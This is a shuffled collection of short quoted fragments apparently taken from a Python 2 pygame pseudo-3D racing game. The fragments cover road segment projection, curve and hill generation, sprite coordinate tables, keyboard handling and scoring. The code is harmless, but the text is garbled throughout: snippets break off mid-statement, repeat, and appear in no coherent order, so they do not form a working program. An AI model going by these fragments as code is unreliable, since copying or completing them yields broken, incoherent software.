d-y1]] c = utils.clr_from_str(color)", "'w': 298, 'h': 190 }, 'BILLBOARD07': { 'x': 313, 'y':", "i print 'curve', seg.get('curve', 0.0) print 'world z', seg['p1']['world']['z'] print", "self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0 self.bg_trees2.rect.left = self.bg_trees1.rect.width", "#ys = h / 2.0 - h / 2.0 *", "len(self.segments) * self.seg_len #self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len", "or k == self.pglc.K_n: return 2 elif k == self.pglc.K_d:", "self.player_go != 2: self.player_go = 0 if 2 in e_keys_up:", "self.h) ys4 = ys3 ''' # for test if i", "ys1, xsl1, ys1, xsl3, ys3, xs3, ys3, seg['color']['rumble']) self.render_polygon(None, xs2,", "#b_percent = 0.5 b_percent = self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve = -", "self.position > self.track_len: self.position -= self.track_len #''' self.draw_on() self.rd_seg_render() def", "self.speed_max = 300.0#180.0#200.0#100.0 self.lane_w = 60 self.seg_n = 300#200 #self.seg_draw_n", "0.0 self.zc = 0.0 ## self.xp = 0.0 self.yp =", "elif x_i == 4: sprt_at = 1100 elif x_i ==", "in e_keys_up: if self.player_go != 2: self.player_go = 0 if", "segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file) def handle_event(self, events, *args, **kwargs):", "= random.randint(10, 100) leave = random.randint(10, 100) self.add_road(enter, hold, leave,", "i) % seg_n #print si seg = self.segments[si] #x#zw1 =", "320, 'h': 220 }, 'COLUMN': { 'x': 995, 'y': 5,", "self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road'])", "else: r_events.append(event) else: r_events.append(event) self.e_keys_up = e_keys_up self.e_keys_dn = e_keys_dn", "def refresh(self, fps_clock, *args, **kwargs): pass class GMFlatpath(pygm.PyGMGame): def __init__(self,", "#i = int(math.floor(pos / self.seg_len)) #i = int(math.ceil(pos / self.seg_len))", "f): with open(f, 'r') as fi: s = fi.read() segs", "self.w) xp2 = self.xc_to_xp(xc2, self.d, zc1) xs2 = self.xp_to_xs(xp2, self.w)", "is not None: e_keys_up.append(di) else: r_events.append(event) elif event.type == self.pglc.KEYDOWN:", "yw}, 'camera': {}, 'screen': {}}, 'curve': curve, 'color': c, 'sprites':", "leave for n in range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y, end_y,", "10) sprt = random.choice(FP_ROAD_SPRTS.keys()) s = { 'name': sprt, 'type':", "else: if not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n)", "as e: print e self.init_rd_segs_rand_1() else: if not keep_segs: self.init_rd_segs_rand_1()", "math.acos(a) tht_d = math.asin(a) return tht_d def get_segs_pnts(self, segs, rad):", "= self.position i = int(pos / self.seg_len) #x#i = int(utils.math_round(pos", "self.player_x > 1000: self.player_di = 3 #''' #''' self.position +=", "self.player_x > self.road_w / 2: self.speed -= 10 if self.speed", "+ (b - a) * (1 - math.pow(1 - percent,", "a=500): for n in range(a): self.rd_seg_add(0.0, 0.0) def rd_seg_add(self, curve=0.0,", "2 - self.player_x #xc2 = -self.road_w / 2 - self.player_x", "[x3, y3-d], [x4, y4-d], [x1, y1-d]] #pnts = [[x1, y1+a],", "sprts: return # NOTE: we now only use the first", "self.player_di = 0 if 3 in e_keys_up: if self.player_di !=", "= seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] ''' zw1 = (i+1)*self.seg_len zw2", "rad a *= 10.0 #print a if a < -1.0:", "zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1 -", "self.player_go = 1 elif 2 in e_keys_dn: self.player_go = 2", "scale_sprt) if obj: self.rd_sprt_cache.append(obj) # render the sprites with right", "n in range(a): self.rd_seg_add(0.0, 0.0) def rd_seg_add(self, curve=0.0, yw=0.0): #print", "self.e_keys_dn = e_keys_dn return r_events def refresh__1(self, fps_clock, *args, **kwargs):", "curve = seg.get('curve', 0.0) if curve == 0.0: rad_m =", "FPSptRoad((640, 240), self.cfg) self.road = FPSptRoadB((640, 240), self.cfg, car=self.car, bg_sky=[self.bg_sky1,", "= self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w) xp2 =", "sprt obj = info.get('obj') ''' # TODO: <1> if not", "from x_pos 'x_i': random.randint(0, 4), 'score': FP_ROAD_SPRTS[sprt].get('score', 0), } self.segments[j]['sprites'].append(s)", "= (i+2)*self.seg_len else: # <1> zw1 = seg['p1']['world']['z'] zw2 =", "480 }, 'SKY': { 'x': 5, 'y': 495, 'w': 1280,", "= math.pi / 2.0 / self.seg_draw_n engi = math.pi /", "= self.xc_to_xp(xcl4, self.d, zc2) xsl4 = self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1,", "the y- d = 116 pnts = [[x1, d-y1], [x2,", "d = 2 n = self.h / d for i", "max(mn, min(value, mx)) def util_accelerate(self, v, accel, dt): return v", "self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200, 200)) self.sn1.rect.top = 100 self.sn1.rect.left", "##x_i = 2 y_sprt = ys1 scale_sprt = seg_scale *", "hold = random.randint(10, 40) leave = random.randint(10, 40) if p", "yp_to_ys(self, yp, h): #ys = h / 2.0 - h", "'x': 995, 'y': 330, 'w': 195, 'h': 140 }, 'SEMI':", "n=50): #print 'rd_seg_init_rand', n for i in range(n): p =", "decrease score when go out the road if self.player_x <", "= rad2 * math.cos(engi * i) xx3 = rad1 *", "* 6.0 yw = 0.0 self.add_road(enter, hold, leave, curve, yw)", "0 self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0 self.bg_trees2.rect.left", "random.randint(3, 30) segnrand = random.randint(2, 6) # for a3c train", "__init__(self, size, cfg, *args, **kwargs): super(FPSptRoadB, self).__init__(size) self.cfg = cfg", "x_pos, x_i, y, scale): sprts = seg.get('sprites') if not sprts:", "self.w) xpl4 = self.xc_to_xp(xcl4, self.d, zc2) xsl4 = self.xp_to_xs(xpl4, self.w)", "len(self.segments) if n is None: #n = seg_n / 20", "for i in range(n): rl = random.choice([1, -1]) enter =", "self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 self.render_polygon(None,", "= xc2 - x_curve xc3 = xc3 - x_curve -", "if not seg['sprites']: segs_c.append(seg) else: seg_c = {} for k,", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "sprt self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self, value, mn, mx): return", "self.seg_draw_n / 4: theta1 = theta_i * i theta2 =", "= e_keys_dn return r_events def refresh__1(self, fps_clock, *args, **kwargs): #print", "sprts: return None for i, info in enumerate(sprts): sprt =", "self.speed = self.speed_max self.position += self.speed if self.position > self.track_len:", "time.time() self.tm_end = self.tm_start else: self.tm_end = time.time() self.tm_last_once =", "== self.pglc.KEYUP: di = self.key_to_di(event.key) if di is None: di", "'y': 1262, 'w': 215, 'h': 220 }, 'STUMP': { 'x':", "sprt_at = 40 elif x_i == 1: sprt_at = -40", "'score': 50,}, 'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'],", "80, 'h': 59 }, 'CAR04': { 'x': 1383, 'y': 894,", "- 10) sprt = random.choice(FP_ROAD_SPRTS.keys()) s = { 'name': sprt,", "144 }, 'TRUCK': { 'x': 1365, 'y': 644, 'w': 100,", "one break return obj def handle_event(self, events, *args, **kwargs): #print", "self.tm_end = time.time() self.tm_last_once = self.tm_end - self.tm_start else: self.tm_start", "if k not in ['sprites']: seg_c[k] = v else: seg_c[k]", "}, 'PLAYER_LEFT': { 'x': 995, 'y': 480, 'w': 80, 'h':", "if n is None: #n = seg_n / 20 n", "# decrease score when go out the road if self.player_x", "2.0 x_dt = x_rnd * seg_scale x_pos = [xsr1, xsr2,", "#print 'sprt_x', sprt_x #print 'car_x', car_x #print 'car_w', car_w #print", "* math.tan(theta_i) #self.player_x -= dpx1 # <1> #for i, seg", "for check score self.last_seg_i = 0 self.game_over = True self.game_score", "n = self.h / d for i in range(n): rct", "[x1, y1]] #pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d],", "**kwargs): super(GMFlatpath, self).__init__(title, winw, winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk", "- xx2) - self.player_x xc3 = (rad - xx3) -", "(i + 1) dx1 = self.seg_len * math.tan(theta1) dx2 =", "(zw1 - self.camera_z) #zc2 = self.position - (zw2 - self.camera_z)", "hold, leave, curve, yw start_y = self.seg_lasy_y() end_y = start_y", "= pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top = 40#454 self.scr.rect.left = 600", "= 610 #self.prog.rotate(180) self.disp_add(self.prog) self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN) self.spd.rect.top", "3 #print 'p_curve', p_curve p_dt = self.speed * p_curve *", "# NOTE: not used now !! ##x_i = 2 y_sprt", "ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) # for", "x_curve - dx_curve xcr4 = xcr4 - x_curve - dx_curve", "if not segs: segs = self.segments segs_c = [] for", "def __init__(self, size, *args, **kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def draw_on(self,", "obj.rect.top = 116 - y + 240 - obj.rect.height obj.rect.left", "check_key(self, events): #print id(events) r_events = [] e_keys_up = []", "segbi self.player_seg = self.segments[segbi] b_curve = self.player_seg.get('curve', 0.0) #b_percent =", "with looping result = start + increment while (result >=", "/ 2.0 - yp return ys def rd_seg_init(self, a=500): for", "= 0.0 self.add_road(enter, hold, leave, curve, yw) def rd_start_seg_init(self, n=3):", "self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i = 0 self.score = 0 self.game_over", "-self.lane_w - self.player_x yc = self.camera_h print '=' * 80", "##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30) segnrand = random.randint(2,", "'screen': {}}, 'curve': curve, 'color': c, 'sprites': [], 'looped': 0,", "end_y, (float(n)+enter)/total)) for n in range(leave): self.rd_seg_add(self.util_ease_out(curve, 0, n/leave), self.util_ease_out(start_y,", "xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) if", "#c = {'road': FP_COLOR_WHITE} else: c = FP_COLORS['DARK'] #c =", "= theta_i * (i + 1) dx1 = self.seg_len *", "self.base_seg['sprites'] if not sprts: return # NOTE: we now only", "self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file)", "0, n/leave), self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total)) def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "sprites # TODO: check if this seg is looped seg_scale", "= c_prog self.progress(0.0) def progress(self, prog): y = self.size[1] *", "= None self.base_seg = None # the segment just under", "self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog() def prms_reset(self,", "100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score':", "0.0 tht = 0.0 rad_m = 4.0#2.0#1.0# cv_s = 0", "sky.rect.left += sky.rect.width * 2 if sky.rect.left - sky.rect.width >", "#p_dt = 40 #p_dt = -40 #p_dt = random.randint(-100, 100)", "x_pos = [xsr1, xsr2, (xsr1 + xsl1) / 2.0, (xsr2", "return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0) def rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand',", "self.segments[segbi] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5 b_percent =", "#theta_i = 0.0 xc1 = self.road_w / 2 - self.player_x", "(xs1 + xs2) / 2.0 #y_sprt = (ys1 + ys3)", "'#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, } FP_ROAD = { 'LENGTH':", "0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100 }, # num", "random.randint(10, 100) leave = random.randint(10, 100) self.add_road(enter, hold, leave, 0.0,", "if event.type == self.pglc.KEYUP: di = self.key_to_di(event.key) if di is", "== self.pglc.K_UP: return 0 elif k == self.pglc.K_RIGHT: return 1", "c=consts.RED, font_size=16) self.scr.rect.top = 40#454 self.scr.rect.left = 600 self.disp_add(self.scr) self.tm_once", "> 1.0: a = 1.0 #tht_d = math.acos(a) tht_d =", "curve, yw) def rd_seg_init_rand_2(self, n=50): for i in range(n): p", "0) def rd_seg_get_cleared(self, segs=None): if not segs: segs = self.segments", "240, 'h': 155 }, 'CACTUS': { 'x': 929, 'y': 897,", "'w': 230, 'h': 220 }, 'BILLBOARD02': { 'x': 245, 'y':", "'w': 240, 'h': 155 }, 'CACTUS': { 'x': 929, 'y':", "/ 2.0 x_dt = x_rnd * seg_scale x_pos = [xsr1,", "to delete all # NOTE: only show one break return", "self.lane_w - self.player_x xcr2 = -self.lane_w - self.player_x xcr3 =", "* 40 w_half = car_w / 2 + sprt_w /", "dx1 xs4 += dx2 #+ dx1 ''' self.render_polygon(None, 0, ys1,", "self.player_x #xc2 = -self.road_w / 2 - self.player_x #xc3 =", "= self.xp_to_xs(xp1, self.w) xp2 = self.xc_to_xp(xc2, self.d, zc1) xs2 =", "}, } IMG_POS_SPRITES = { 'PALM_TREE': { 'x': 5, 'y':", "== self.pglc.K_v or k == self.pglc.K_n: return 2 elif k", "self).__init__(img_file) class FPSptBg(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptBg,", "0 if 1 in e_keys_up: if self.player_di != 3: self.player_di", "= GMFlatpath('flatpath <:::>', 640, 480) sf = GMFlatpath('flatpath <:::>', 640,", "'x': 1383, 'y': 825, 'w': 80, 'h': 59 }, 'CAR04':", "*args, **kwargs): #self.fill(self.c) d = 2 n = self.h /", "= 1 elif 3 in e_keys_dn: self.player_di = 3 if", "self.player_di = 3 if 0 in e_keys_up: if self.player_go !=", "'h': 41 }, 'PLAYER_STRAIGHT': { 'x': 1085, 'y': 480, 'w':", "self.position > self.seg_len * 2: if self.tm_start == 0.0: self.tm_start", "= FP_COLORS['START_Y'] def rd_sprts_init_rand(self, n=None): seg_n = len(self.segments) if n", "the segment just under the car self.player_di = 0 #", "self.yc_to_yp(yc2, self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3", "{'z': (n + 2) * self.seg_len, 'y': yw}, 'camera': {},", "= random.randint(0, len(x_pos) - 1) # NOTE: not used now", "train self.rd_seg_init_rand(segnrand) # for segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) #", "'sprites': [], 'looped': 0, } self.segments.append(seg) self.track_len = len(self.segments) *", "seg_c[k] = v else: seg_c[k] = [] for spr in", "xc3 = self.road_w / 2 - self.player_x xc4 = -self.road_w", "cv_l = 0.0 pnts.append([x, y]) for seg in segs: curve", "'scale <2>', scale pass x_i_saved = info.get('x_i') #if not x_i_saved:", "is too large if scale > 500: #print 'scale <1>',", "= -1.0 elif a > 1.0: a = 1.0 #tht_d", "x_curve xc3 = xc3 - x_curve - dx_curve xc4 =", "p_dt = self.speed * p_curve * self.centrifugal #p_dt = 40", "road * more road sprites * sound \"\"\" import math", "['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,}, 'rockd': {'imgs':", "'w': 215, 'h': 540 }, 'BILLBOARD08': { 'x': 230, 'y':", "480, 'w': 80, 'h': 41 }, 'PLAYER_STRAIGHT': { 'x': 1085,", "self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x, y): return [self.size[0] / 2", "> self.road_w / 2: if self.score > 0: self.score -=", "+ self.lane_w #xcl3 = xc3 - self.lane_w #xcl4 = xc4", "return segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 = self.road_w / 2", "seg['p2']['world']['z'] ''' zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len zc1 =", "e_keys_dn return r_events def refresh__1(self, fps_clock, *args, **kwargs): #print '>>>", "= { 'name': sprt, 'type': 1, # image / animate", "== 3: sprt_at = -580 elif x_i == 4: sprt_at", "#xcl3 = xc3 - self.lane_w #xcl4 = xc4 + self.lane_w", "self.tm_start == 0.0: self.tm_start = time.time() self.tm_end = self.tm_start else:", "seg['p1']['world']['z'] print 'world y', seg['p1']['world'].get('y', 0.0) #print '-' * 30", "y2, x3, y3, x4, y4, color): #d = 200#100#240#50# #a", "4.0#2.0#1.0# pnts.append([x, y]) for seg in segs: curve = seg.get('curve',", "return None for i, info in enumerate(sprts): sprt = info['name']", "self.size[1] - y, self.size[0] - 2, y]) class FPStraight(pygm.PyGMSprite): def", "2: if self.score > 0: self.score -= 1 #self.score -=", "* UP/DOWN/LEFT/RIGHT * SPACE : hide/show road map * TAB", "self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left = self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png',", "#print enter, hold, leave, curve, yw start_y = self.seg_lasy_y() end_y", "xcr3 = self.lane_w - self.player_x xcr4 = -self.lane_w - self.player_x", "*args, **kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def create_by_img(cls, img): return cls(img)", "'#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' }, 'START': {'road': FP_COLOR_WHITE, 'grass':", "-FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "# always move the cloud for sky in self.bg_sky: sky.rect.left", "SPACE : hide/show road map * TAB : replay this", "2 ##self.disp_add(self.car) # car disp add after road #self.road =", "'-' * 40 w_half = car_w / 2 + sprt_w", "None: e_keys_dn.append(di) else: r_events.append(event) else: r_events.append(event) self.e_keys_up = e_keys_up self.e_keys_dn", "0.0) # clear the sprites cache self.rd_sprt_cache = [] #", "c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left = 600 self.disp_add(self.tm_once) self.prog", "+ w / 2.0 * xp xs = w /", "FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK} seg = { 'index': n,", "#p_curve = 3 #print 'p_curve', p_curve p_dt = self.speed *", "625, 'y': 5, 'w': 360, 'h': 360 }, 'DEAD_TREE1': {", "[[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]]", "# for hills yw1 = seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y',", "= 0 if 3 in e_keys_up: if self.player_di != 1:", "y1]] #pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4,", "{ 'x': 150, 'y': 555, 'w': 328, 'h': 282 },", "self.player_seg.get('curve', 0.0) #p_curve = 3 #print 'p_curve', p_curve p_dt =", "'x': 625, 'y': 5, 'w': 360, 'h': 360 }, 'DEAD_TREE1':", "Width or height is too large if scale > 500:", "check_if_car_out_road(self): # decrease score when go out the road if", "= sprt.get('score') if not scr: # None or 0 return", "= FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK} seg = { 'index':", "len(x_pos) - 1) # NOTE: not used now !! ##x_i", "2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0 self.lane_w = 60", "= self.xc_to_xp(xcl3, self.d, zc2) xsl3 = self.xp_to_xs(xpl3, self.w) xpl4 =", "self.draw_on() def draw_on(self, *args, **kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] /", "1.0#0.1# else: a = float(curve) / rad a *= 10.0", "not in ['sprites']: seg_c[k] = v else: seg_c[k] = []", "if not self.flag_check_event: return events else: return self.check_key(events) def key_to_di(self,", "self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3, self.d, zc2) xsl3 = self.xp_to_xs(xpl3,", "def update_bg(self): # always move the cloud for sky in", "<3> xx1 = rad1 * math.cos(engi * i) xx2 =", "rd_sprts_init_rand(self, n=None): seg_n = len(self.segments) if n is None: #n", "- self.player_x - curve_d * i # <3> xx1 =", "starfish import consts from starfish import sptdraw from starfish import", "+= dx2 #+ dx1 xs4 += dx2 #+ dx1 '''", "used now !! ##x_i = 2 y_sprt = ys1 scale_sprt", "1365, 'y': 490, 'w': 122, 'h': 144 }, 'TRUCK': {", "-self.road_w / 2 or \\ self.player_x > self.road_w / 2:", "3: # < self.player_x -= 9 if self.player_x < -1000:", "'car_x', car_x #print 'car_w', car_w #print 'sprt_at', (car_x - car_w", "/ 2 - self.player_x - curve_d * i xp1 =", "ys4, 0, ys3, seg['color']['grass']) # road self.render_polygon(None, xs1, ys1, xs2,", "self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20, 2.0) ##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3,", "if cv_s: tht_d = self.cv_to_engl(cv_l, rad) #tht += tht_d tht", "* FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10, 100) hold = random.randint(10,", "= 0 self.rdmap.rect.left = 80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)),", "xc4 = (rad - xx4) - self.player_x xp1 = self.xc_to_xp(xc1,", "= rad2 * math.cos(engi * (i + 1)) xc1 =", "r_events def refresh__1(self, fps_clock, *args, **kwargs): #print '>>> refresh' #'''", "self.prog.rect.top = 70#340 self.prog.rect.left = 610 #self.prog.rotate(180) self.disp_add(self.prog) self.spd =", "self.xc_to_xp(xcr4, self.d, zc2) xsr4 = self.xp_to_xs(xpr4, self.w) self.render_polygon(None, xsr1, ys1,", "232, 'h': 152 }, 'BILLBOARD03': { 'x': 5, 'y': 1262,", "= {'road': FP_COLOR_BLACK} seg = { 'index': n, 'p1': {'world':", "self.game_score = 1.0 if self.player_di == 1: #self.player_x += self.player_x_dt", "be deleted at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj", "pygm.SptImg(bk_im) self.bk.rect.top = -230 self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1 =", "p rl = random.choice([1, -1]) enter = random.randint(10, 40) hold", "keep_segs=True) def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False,", "/ self.seg_len)) #i = int(math.floor(pos / self.seg_len)) #i = int(math.ceil(pos", "if self.player_go == 1: self.speed += self.speed_dt_up elif self.player_go ==", "def prms_reset(self, keep_segs=False): self.e_keys_up = [] self.e_keys_dn = [] self.camera_x", "self.h / d for i in range(n): rct = [0,", "4#2 rad1 = rad + self.road_w / 2 rad2 =", "d-y4], [x1, d-y1]] c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c, pnts)", "= utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk = pygm.SptImg('data/img_bk_1.jpg') self.bk = pygm.SptImg(bk_im) self.bk.rect.top", "0.0: self.tm_start = time.time() self.tm_end = self.tm_start else: self.tm_end =", "y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]] #pnts = [[x1,", "1383, 'y': 961, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': {", "forever. http://codeincomplete.com/posts/javascript-racer/ http://www.extentofthejam.com/pseudo/ http://pixel.garoux.net/screen/game_list Usage: * UP/DOWN/LEFT/RIGHT * SPACE :", "== 0.0: rad_m = 1.0#0.1# else: a = float(curve) /", "*= 10.0 #print a if a < -1.0: a =", "0.0 self.xs = 0.0 self.ys = 0.0 self.d = 200.0#100.0#10.0#30.0#1.0", "2 n = self.h / d for i in range(n):", "self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg() def", "(1 - math.pow(1 - percent, 2)) def util_ease_in_out(self, a, b,", "-self.road_w / 2 - self.player_x # <3> #engi = math.pi", "1)) xx4 = rad2 * math.cos(engi * (i + 1))", "seg['sprites']: segs_c.append(seg) else: seg_c = {} for k, v in", "**kwargs): super(SptTmpi, self).__init__(img_file) class FPSptBg(pygm.SptImgOne): def __init__(self, img_file, pos, *args,", "= ys3 ''' #if 1: #if i < self.seg_draw_n /", "d, self.size[0], d] #ca = 255 / n * (n", "-1000: self.player_di = 1 elif self.player_di == 1: self.player_x +=", "= dx_curve + seg.get('curve', 0.0) xp1 = self.xc_to_xp(xc1, self.d, zc1)", "2.0 - yp return ys def rd_seg_init(self, a=500): for n", "2:v 3:< self.player_go = 0 # 0:- 1:^ 2:v self.speed_dt_up", "self.player_di = 0 # 0:^ 1:> 2:v 3:< self.player_go =", "in range(n): rl = random.choice([1, -1]) enter = random.randint(10, 40)", "end_y, float(n)/total)) for n in range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y, end_y, (float(n)+enter)/total))", "num, num, 0, height) self.add_road(num, num, num, 0, 0) self.add_road(num,", "{ 'x': 1365, 'y': 490, 'w': 122, 'h': 144 },", "self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg() def check_player_di(self, e_keys_dn, e_keys_up):", "for i in range(n): p = random.random() #print p rl", "- xx1) - self.player_x xc2 = (rad - xx2) -", "dx_curve + seg.get('curve', 0.0) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1", "fps_clock, *args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position /", "0.0: if cv_s: tht_d = self.cv_to_engl(cv_l, rad) #tht += tht_d", "pnts = self.get_segs_pnts(segs, rad) #print pnts if len(pnts) <= 1:", "def rd_seg_get_cleared(self, segs=None): if not segs: segs = self.segments segs_c", "self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left =", "2.0 * xp xs = w / 2.0 + xp", "self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc, self.d,", "move the cloud #sky.rect.left -= self.sky_speed if sky.rect.left + sky.rect.width", "'y': 5, 'w': 200, 'h': 315 }, 'BILLBOARD01': { 'x':", "i) % seg_n #print si seg = self.segments[si] #''' '''", "** 64 yp = yc else: yp = yc *", "for a3c train self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self, *args, **kwargs): self.fill(self.clr_dark_grass)", "i def rd_get_segs(self, whole=False): if whole: segs = self.segments else:", "0.0: return p_curve = self.player_seg.get('curve', 0.0) #p_curve = 3 #print", "pos, *args, **kwargs): super(FPSptBg, self).__init__(img_file, pos) class FPSptSprts(pygm.SptImgOne): def __init__(self,", "def rd_seg_render__3_o(self): \"\"\"curve test 2: draw a circle\"\"\" #theta_i =", "yw2 #print yw1, yw2 xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1", "(i+1)*self.seg_len #zw2 = (i+2)*self.seg_len #''' # <1> zw1 = seg['p1']['world']['z']", "0: hill.rect.left -= hill.rect.width * 2 for trees in self.bg_trees:", "init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1, 10)) # for", "<1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] ''' zw1 =", "}, 'COLUMN': { 'x': 995, 'y': 5, 'w': 200, 'h':", "2 #obj.scale(scale) info['obj'] = obj ##self.disp_add(obj) # NOTE: render out", "0.0 self.yp = 0.0 self.xs = 0.0 self.ys = 0.0", "'h': 480 }, 'TREES': { 'x': 5, 'y': 985, 'w':", "= self.road_w * 4#2 rad1 = rad + self.road_w /", "+ car_w / 2) < sprt_x < (car_x + car_w", "= 0.2#0.1# self.tree_speed = 0.3#0.15# def rd_reset(self, init=False, keep_segs=False, segs_file=None):", "(n + 2) * self.seg_len, 'y': yw}, 'camera': {}, 'screen':", "self.seg_lasy_y()}, 'camera': {}, 'screen': {}}, 'p2': {'world': {'z': (n +", "'y': 330, 'w': 195, 'h': 140 }, 'SEMI': { 'x':", "= 0.0 self.seg_len = 